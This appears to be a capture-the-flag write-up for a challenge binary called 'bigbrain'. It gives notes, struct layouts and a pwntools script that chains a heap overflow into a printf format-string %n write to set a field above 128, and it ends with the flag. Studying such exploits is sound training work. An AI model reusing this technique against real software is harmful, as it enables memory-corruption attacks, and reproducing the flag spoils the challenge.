Notes:
- We know address of qi_de_base
- 0x8202010
- There is format string vuln
- printf(user->display, user->name, user->sex);
- user data is written in heap
- no aslr and no pie
- Have heap overflow on user->name
typedef struct moron
{
int qi;
char sex;
char name[STR_LEN];
display[STR_LEN];
}person
This is the user->qi person *user = new_p();
Steps:
- Use heap overflow on user->name to write into user->display
- user->display is where the fmt string bug is located
- Find address of *user with format string
- target is person *user = new_p(), goal is to override user->qi which is the first index of the struct.
- Send payload to write to address of user->qi (from step 3)
after filling user->name buffer Final payload: Junk (to fill user->name) + payload to write to user->display + format string to write to user->qi with length of payload written to user->display
Heap Overflow
typedef struct moron
{
int qi;
char sex;
char name[64];
display[64];
}person
Person *user = new Moron;
// Heap overflow to override display
scanf("%s", user->name)
Format String
user_display = 'A' * val_length_for_qi + "offset_to_qi%n"; printf(user_display);
Goal
// To make user->qi > 128
if (user->qi > 128) {
puts("WIN");
} else {
puts("Vous êtes sûrs d'être en bonne santé ?");
}
Code
from pwn import *
io = process('./bigbrain')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-v']
def nom(payload, io):
io.sendlineafter('Nom :', payload)
def sexe(payload, io):
io.sendlineafter('Sexe [M/F] :', payload)
junk = b'A'*0x40
val_length_for_qi = b'B'*129
fmt_string_offset = b'%9$n,'
nom_payload = (
junk
+ val_length_for_qi
+ fmt_string_offset
)
sexe_payload = 'M'
nom(nom_payload, io)
sexe(sexe_payload, io)
io.interactive()
# H2G2{w0w_5uch_vu1n3r4b1lit13s}
